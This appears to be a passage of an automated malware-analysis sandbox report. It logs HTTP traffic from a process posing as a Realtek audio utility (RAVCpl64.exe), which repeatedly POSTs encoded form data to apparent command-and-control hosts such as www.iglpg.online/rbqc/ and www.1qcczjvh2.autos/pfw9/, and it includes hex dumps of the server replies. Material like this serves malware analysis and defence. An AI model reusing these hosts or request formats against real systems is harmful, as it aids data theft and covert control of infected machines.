                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                  Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  74192.168.11.30499413.33.130.190805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:16.277427912 CET672OUTPOST /rbqc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.iglpg.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.iglpg.online
                                                                                                  Referer: http://www.iglpg.online/rbqc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 30 6f 47 70 4c 71 45 4c 39 39 72 46 57 5a 67 6e 76 72 4e 44 51 77 79 72 56 30 69 4c 57 32 4a 79 57 53 63 45 56 71 41 73 77 6d 6c 2f 69 71 53 68 4d 49 79 69 57 73 34 35 63 56 74 45 59 55 73 67 43 49 31 77 52 6d 7a 6c 32 37 55 66 42 47 36 53 66 4e 64 37 51 4b 68 38 4c 67 46 33 6f 71 34 5a 79 54 37 52 44 49 64 6b 7a 65 6c 67 64 58 6d 77 6a 38 6d 4d 57 2b 79 48 47 50 56 68 2b 4f 38 37 44 54 75 67 30 6d 71 72 6f 6c 6e 51 48 74 2f 73 31 77 6e 4b 41 41 62 48 76 51 34 6e 31 58 63 59 35 33 4b 73 56 6d 4e 4e 52 71 4b 4d 76 30 6c 4c 4c 36 46 5a 53 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=6MJTL6kNv0zH0oGpLqEL99rFWZgnvrNDQwyrV0iLW2JyWScEVqAswml/iqShMIyiWs45cVtEYUsgCI1wRmzl27UfBG6SfNd7QKh8LgF3oq4ZyT7RDIdkzelgdXmwj8mMW+yHGPVh+O87DTug0mqrolnQHt/s1wnKAAbHvQ4n1XcY53KsVmNNRqKMv0lLL6FZSQ==


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  75192.168.11.30499423.33.130.190805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:21.947321892 CET692OUTPOST /rbqc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.iglpg.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 224
                                                                                                  Origin: http://www.iglpg.online
                                                                                                  Referer: http://www.iglpg.online/rbqc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 46 39 79 59 54 73 45 55 72 41 73 33 6d 6c 2f 74 36 53 6f 43 6f 79 39 57 73 45 4c 63 58 35 45 59 55 34 67 43 4a 46 77 52 33 7a 71 31 4c 56 35 4d 6d 36 55 42 39 64 37 51 4b 68 38 4c 67 52 5a 6f 71 41 5a 79 6a 4c 52 42 70 64 6e 2b 2b 6c 6a 4c 48 6d 77 6e 38 6d 49 57 2b 79 78 47 4e 68 59 2b 49 34 37 44 53 65 67 30 33 71 73 6d 6c 6d 56 61 39 2b 47 78 79 58 43 4d 55 76 4c 69 52 51 5a 37 55 35 73 38 67 6e 32 49 6c 35 50 43 4b 32 68 7a 31 49 6a 4a 34 45 43 50 65 4d 74 43 47 38 48 4b 6e 55 33 6b 51 4d 5a 74 49 6c 45 5a 46 77 3d
                                                                                                  Data Ascii: 6aonl5x=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXF9yYTsEUrAs3ml/t6SoCoy9WsELcX5EYU4gCJFwR3zq1LV5Mm6UB9d7QKh8LgRZoqAZyjLRBpdn++ljLHmwn8mIW+yxGNhY+I47DSeg03qsmlmVa9+GxyXCMUvLiRQZ7U5s8gn2Il5PCK2hz1IjJ4ECPeMtCG8HKnU3kQMZtIlEZFw=


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  76192.168.11.30499433.33.130.190805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:24.586952925 CET2578OUTPOST /rbqc/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.iglpg.online
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.iglpg.online
                                                                                                  Referer: http://www.iglpg.online/rbqc/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 36 4d 4a 54 4c 36 6b 4e 76 30 7a 48 79 49 57 70 4d 4a 38 4c 38 64 72 43 53 70 67 6e 67 4c 4e 48 51 77 2b 72 56 32 4f 69 58 45 46 79 59 6c 59 45 56 4d 55 73 32 6d 6c 2f 72 4b 53 6c 43 6f 7a 68 57 6f 51 50 63 58 6c 55 59 58 41 67 44 76 5a 77 47 31 58 71 69 37 56 35 51 57 36 56 66 4e 64 71 51 4b 78 34 4c 67 42 5a 6f 71 41 5a 79 6c 50 52 49 59 64 6e 74 75 6c 67 64 58 6d 38 6a 38 6e 76 57 2f 57 68 47 4e 6c 49 2b 4f 6b 37 44 6c 36 67 30 42 57 73 6d 6c 6d 56 58 64 2b 44 78 79 62 42 4d 55 58 68 69 51 49 6e 37 69 46 73 78 6b 32 2b 55 78 4e 6d 66 61 79 72 35 51 67 79 41 65 59 42 46 4f 45 57 4f 56 59 63 41 6e 35 5a 68 46 77 63 31 49 34 46 49 77 6f 79 67 6e 6a 65 53 38 7a 59 49 62 30 32 38 64 64 57 61 36 30 57 35 77 36 66 66 63 67 70 50 59 6a 72 61 4f 73 78 49 54 46 6b 6a 61 31 51 78 47 59 77 39 42 34 53 78 7a 4f 4b 63 44 4d 74 6e 65 51 5a 6f 42 47 4e 66 41 2f 69 61 74 4d 42 33 76 55 39 43 34 33 35 54 53 49 52 38 6c 6d 39 77 51 43 79 77 31 76 6a 55 46 6c 56 43 5a 78 6e 65 32 5a 2b 52 4e [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=6MJTL6kNv0zHyIWpMJ8L8drCSpgngLNHQw+rV2OiXEFyYlYEVMUs2ml/rKSlCozhWoQPcXlUYXAgDvZwG1Xqi7V5QW6VfNdqQKx4LgBZoqAZylPRIYdntulgdXm8j8nvW/WhGNlI+Ok7Dl6g0BWsmlmVXd+DxybBMUXhiQIn7iFsxk2+UxNmfayr5QgyAeYBFOEWOVYcAn5ZhFwc1I4FIwoygnjeS8zYIb028ddWa60W5w6ffcgpPYjraOsxITFkja1QxGYw9B4SxzOKcDMtneQZoBGNfA/iatMB3vU9C435TSIR8lm9wQCyw1vjUFlVCZxne2Z+RNbpCyvl6jG/GEJxOGftDl0LnfAooK3vVp426Z7Gi0DMMMhS2cX7gyGuJt/X0WO5aynlwWqI4hNfc2E1+9u9JT6PaLV6E/pOHZ/8qnXmBf7Oc5rS1lflPjuG2EXyZiSux2lc+M4uCDZZ/R3IUD4rjo5nkGgOzN5b6Qy/xN//dKdOwbivlJibFldAj9Xb10oJ605zARcNRk6XezzuwxOJTJ465YUJuD1Hq0PycWd5j6H8+IWlbMiC93VmCTTb9RT0R/YR9CVieNIhgA5tUJVo38uTAH7f9mJaUXQw1UvQbzkaL9xFmBsfphrL0W2dgdJkM6iZKp8WJ3A4zicNS1MiBFYwXwrSW35U3V8sbdI+9vxRIlZL+vfPr/t0yW0lD2BjvbnuE2qlEIUpUQnXCNbGicMSHy4ZAx2hufNAhtW0a38k5JJKSNj820cVe2XFoirVsv1cphfMccnq3PYO43Tyg5bqyIR5wn2QSN03oxChfwPPigqnqsG9kYqwYBYboWU9BVMnl7sOYU19BD86ePmIqH2lnuDwWp7nRjoHvKZimWSQ0z7X1fHjoAEjQ+bhTttwl4JVMY2FmMz4VEN3E0VAv8IRoxfCQ7gIWOup7lZGNpH4Jgejw3t43uEsBOO/dqFthW1903mQUJZo0mYwnL+VmVvTR1iFR20J9TFf [TRUNCATED]
                                                                                                  Dec 3, 2024 09:52:24.586996078 CET1231OUTData Raw: 37 6a 77 2b 57 49 41 4f 73 79 43 52 4f 43 4a 53 74 6c 54 6b 2f 4c 53 2b 4a 2f 2f 44 4e 6c 79 6e 44 72 75 70 53 42 36 69 5a 67 79 74 33 77 47 56 5a 48 50 45 5a 73 6e 67 6a 57 6e 68 6d 39 69 72 4b 30 4c 58 34 72 74 6b 2f 6a 77 7a 57 6f 39 2b 61 50
                                                                                                  Data Ascii: 7jw+WIAOsyCROCJStlTk/LS+J//DNlynDrupSB6iZgyt3wGVZHPEZsngjWnhm9irK0LX4rtk/jwzWo9+aPGQesbyWszGxfNTdtaK+c2wPGbO8XzxnsbKLT5xcXuaXnq5mWv4YDYWpfYsST8S9B63z9wU4eib5ZSENO3GIfyXnNN39Sql82VaSkJKxMGYj85SOVihNV0DS4+uL+mjax8KaomXC8XiPtoG7cU4fKCW8DEg8p5dXBp


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  77192.168.11.30499443.33.130.190805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:27.228329897 CET413OUTGET /rbqc/?6aonl5x=3OhzIPQDpE/WyOq7C50qyvj3dc8PiYJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPw974q4r0F7yEJBb1u8=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.iglpg.online
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:52:27.340080976 CET405INHTTP/1.1 200 OK
                                                                                                  Server: openresty
                                                                                                  Date: Tue, 03 Dec 2024 08:52:27 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 265
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 36 61 6f 6e 6c 35 78 3d 33 4f 68 7a 49 50 51 44 70 45 2f 57 79 4f 71 37 43 35 30 71 79 76 6a 33 64 63 38 50 69 59 4a 77 46 48 43 38 56 68 47 67 59 57 6c 42 4e 43 51 4d 52 62 41 30 34 6b 6b 58 68 63 69 62 4f 64 47 61 61 59 51 55 45 33 68 2f 64 58 4d 38 49 37 56 47 4e 33 72 6c 70 37 5a 33 4a 77 47 48 43 75 55 35 66 73 31 67 50 77 39 37 34 71 34 72 30 46 37 79 45 4a 42 62 31 75 38 3d 26 77 59 48 6b 3d 4d 5f 42 2d 67 68 63 32 48 71 6f 57 68 6d 65 43 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?6aonl5x=3OhzIPQDpE/WyOq7C50qyvj3dc8PiYJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPw974q4r0F7yEJBb1u8=&wYHk=M_B-ghc2HqoWhmeC"}</script></head></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  78192.168.11.3049945129.226.153.85805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:32.692522049 CET681OUTPOST /pfw9/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.1qcczjvh2.autos
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 204
                                                                                                  Origin: http://www.1qcczjvh2.autos
                                                                                                  Referer: http://www.1qcczjvh2.autos/pfw9/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 45 78 6f 6e 6a 4a 45 4f 37 62 54 49 76 67 72 6f 38 49 73 4a 6f 70 65 63 65 6c 39 4c 59 6c 4c 79 77 63 59 42 2f 69 4f 47 71 43 34 4e 50 6b 44 4f 2b 59 66 68 7a 73 38 33 4f 35 42 4c 53 62 49 49 4a 71 78 39 4b 5a 4b 47 4e 32 31 79 45 32 31 41 51 35 72 6a 66 75 55 63 47 46 52 51 47 68 68 32 4a 56 39 77 5a 2b 4f 52 32 49 6b 65 71 68 49 7a 47 67 32 30 6f 47 56 73 76 48 56 52 42 42 49 42 6a 69 56 4a 57 52 55 71 37 79 33 48 58 30 6c 49 58 42 6f 49 4c 74 7a 68 36 6b 42 32 37 32 77 38 61 61 36 44 7a 47 34 33 62 75 30 56 49 50 36 5a 6f 6b 46 4a 4b 51 3d 3d
                                                                                                  Data Ascii: 6aonl5x=17NZVBLvh1g4ExonjJEO7bTIvgro8IsJopecel9LYlLywcYB/iOGqC4NPkDO+Yfhzs83O5BLSbIIJqx9KZKGN21yE21AQ5rjfuUcGFRQGhh2JV9wZ+OR2IkeqhIzGg20oGVsvHVRBBIBjiVJWRUq7y3HX0lIXBoILtzh6kB272w8aa6DzG43bu0VIP6ZokFJKQ==
                                                                                                  Dec 3, 2024 09:52:33.032449961 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Server: Tengine
                                                                                                  Date: Tue, 03 Dec 2024 08:52:32 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Content-Length: 58288
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  ETag: "67344967-e3b0"
                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                                                                  Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                                                                  Dec 3, 2024 09:52:33.032509089 CET1289INData Raw: 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41
                                                                                                  Data Ascii: v class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJ
                                                                                                  Dec 3, 2024 09:52:33.032552958 CET1289INData Raw: 65 2b 62 6a 71 39 61 44 35 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35
                                                                                                  Data Ascii: e+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/u
                                                                                                  Dec 3, 2024 09:52:33.032596111 CET1289INData Raw: 43 5a 45 72 71 65 69 72 5a 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37
                                                                                                  Data Ascii: CZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776Hxik4DiCgGQBc8HCZieboMtxYaag15ij4WwBYa285mQCcDTsJOeAMDK1nJ31sF8aHXuRBD5lGKdTEeh+V6bE71eI5LPpOULoCz67ByAJwr6uSyI+MrQt7VeunBMaskNt0QOc3bIomFbc8TgMmY3nG4nfv+a2i8o
                                                                                                  Dec 3, 2024 09:52:33.032639027 CET1289INData Raw: 79 49 4e 51 42 68 35 62 67 30 41 31 67 5a 52 58 30 34 52 2b 4a 78 4a 69 58 52 52 4a 37 57 43 53 70 6a 53 68 4a 7a 30 69 4d 56 57 53 4d 2b 54 48 49 7a 69 72 50 70 74 72 4b 34 34 65 58 73 43 39 32 7a 6f 4d 6b 72 62 58 52 58 45 30 41 63 32 6a 73 58
                                                                                                  Data Ascii: yINQBh5bg0A1gZRX04R+JxJiXRRJ7WCSpjShJz0iMVWSM+THIzirPptrK44eXsC92zoMkrbXRXE0Ac2jsXy8tA7PrsLKtYkl4a7JhOwSCA/MMClyJx2G5Fg52XtNMc24a1ColeYTZD/6x7Mj41wCMt2XspeK/aVJ+5AH4eX+poG0LgD8U2P0jIaJbAK7as8sVxZ5rzkzpgxlxvcCYrXWp3gAb+uAPiTG70+Uci7U05FxCWzplHP
                                                                                                  Dec 3, 2024 09:52:33.032680988 CET1289INData Raw: 49 51 41 78 41 48 59 43 75 44 69 70 37 61 77 6e 35 30 32 6a 6f 71 63 49 44 50 41 57 69 42 72 69 64 73 49 57 42 50 68 2b 55 57 51 62 6f 6e 53 78 5a 70 43 50 57 6d 49 32 6c 52 38 79 33 36 72 66 5a 43 67 4e 62 39 6b 62 4f 6b 30 4c 4f 37 33 36 46 52
                                                                                                  Data Ascii: IQAxAHYCuDip7awn502joqcIDPAWiBridsIWBPh+UWQbonSxZpCPWmI2lR8y36rfZCgNb9kbOk0LO736FRDfZjPi/nPTk49bzZIADFt2ZLwXgIG2bBkQvPL4yhVswb7uNDqsKziuVyFmhEDv50RJiid5DarQB0GNIN91yLJUhZ9Nkb4MsCenYrfBqNdC1iJrCaAjgKYAyjMGFc8Tq+irG77kwPnf956/PQle6gtIwT2IzAv2K2/
                                                                                                  Dec 3, 2024 09:52:33.032713890 CET475INData Raw: 65 50 52 47 4b 74 4d 2b 4f 72 53 37 75 64 59 43 6c 58 47 31 41 6a 63 37 36 2f 57 47 50 38 62 6e 74 75 2b 42 62 62 66 76 2b 2f 2f 43 2b 45 4c 6a 74 49 76 4a 44 4a 75 32 5a 48 78 6e 77 4d 59 59 38 74 4f 6b 6c 6a 49 6a 36 63 6e 7a 32 46 66 37 42 78
                                                                                                  Data Ascii: ePRGKtM+OrS7udYClXG1Ajc76/WGP8bntu+Bbbfv+//C+ELjtIvJDJu2ZHxnwMYY8tOkljIj6cnz2Ff7BxGY9p2BNFfcj1EarSq2aKMrzb+kski4mHNLWuwj3Y3Qqo+DyLb3x+CXR35fzoGo54D0BpATwDdAJQpypYB4Ij+eLqk37C3Jq2Mx1PBU1DK78G64jlo+FdxzzoNPIUBaO9Mf5yKw+pVL/wCgO9yREvn12o0mXb8J+Pr
                                                                                                  Dec 3, 2024 09:52:33.032757044 CET1289INData Raw: 7a 65 74 51 73 31 79 4c 74 78 5a 73 55 71 46 47 2b 62 31 51 71 32 52 6e 52 62 67 4a 4c 59 58 68 75 76 6c 74 38 42 51 4f 77 41 69 35 70 4a 72 44 46 43 66 53 66 51 6b 42 35 6b 79 4c 61 57 6a 4d 2f 47 39 37 48 39 73 65 32 31 46 69 30 6a 57 35 66 31
                                                                                                  Data Ascii: zetQs1yLtxZsUqFG+b1Qq2RnRbgJLYXhuvlt8BQOwAi5pJrDFCfSfQkB5kyLaWjM/G97H9se21Fi0jW5f1TCR635atXVE6smxq5cXtY7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee
                                                                                                  Dec 3, 2024 09:52:33.032804012 CET1289INData Raw: 4c 6a 31 6b 4f 4f 78 41 4f 41 71 47 50 75 78 4f 50 30 75 6c 73 50 71 55 65 38 6a 45 34 42 6c 44 2f 35 6d 59 4e 56 2b 2b 6d 50 2f 68 6d 75 44 44 79 77 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66
                                                                                                  Data Ascii: Lj1kOOxAOAqGPuxOP0ulsPqUe8jE4BlD/5mYNV++mP/hmuDDywzi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZ
                                                                                                  Dec 3, 2024 09:52:33.035000086 CET1289INData Raw: 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57 49 49 36
                                                                                                  Data Ascii: 78tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imbHCp
                                                                                                  Dec 3, 2024 09:52:33.370893002 CET1289INData Raw: 45 47 68 32 32 4a 36 2f 71 6b 74 4b 52 32 52 62 32 61 57 77 66 2b 69 42 30 4e 41 6a 76 32 37 44 62 7a 42 62 46 75 61 7a 55 6d 55 73 64 6c 69 53 4a 68 32 45 6a 4c 63 55 69 57 54 39 59 64 32 62 68 34 50 69 2b 30 51 4d 59 32 48 4b 6c 37 58 4a 45 74
                                                                                                  Data Ascii: EGh22J6/qktKR2Rb2aWwf+iB0NAjv27DbzBbFuazUmUsdliSJh2EjLcUiWT9Yd2bh4Pi+0QMY2HKl7XJEtcp5+UcvP7N31rQj21ZU9yvVmEA7HOxea8jqpz0cvK44XIOCrHSzVQy7mrmGPz9uy9XS2sF3wHEGkKIP3z4WFfufVrR0A8a831chj4DlitoMVZGLzgB+AJEPiMIJWMsTt+Hw7R+8wVgrBW0fw2MMGDUY9Y0hr1W968


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  79192.168.11.3049946129.226.153.85805368C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                  TimestampBytes transferredDirectionData
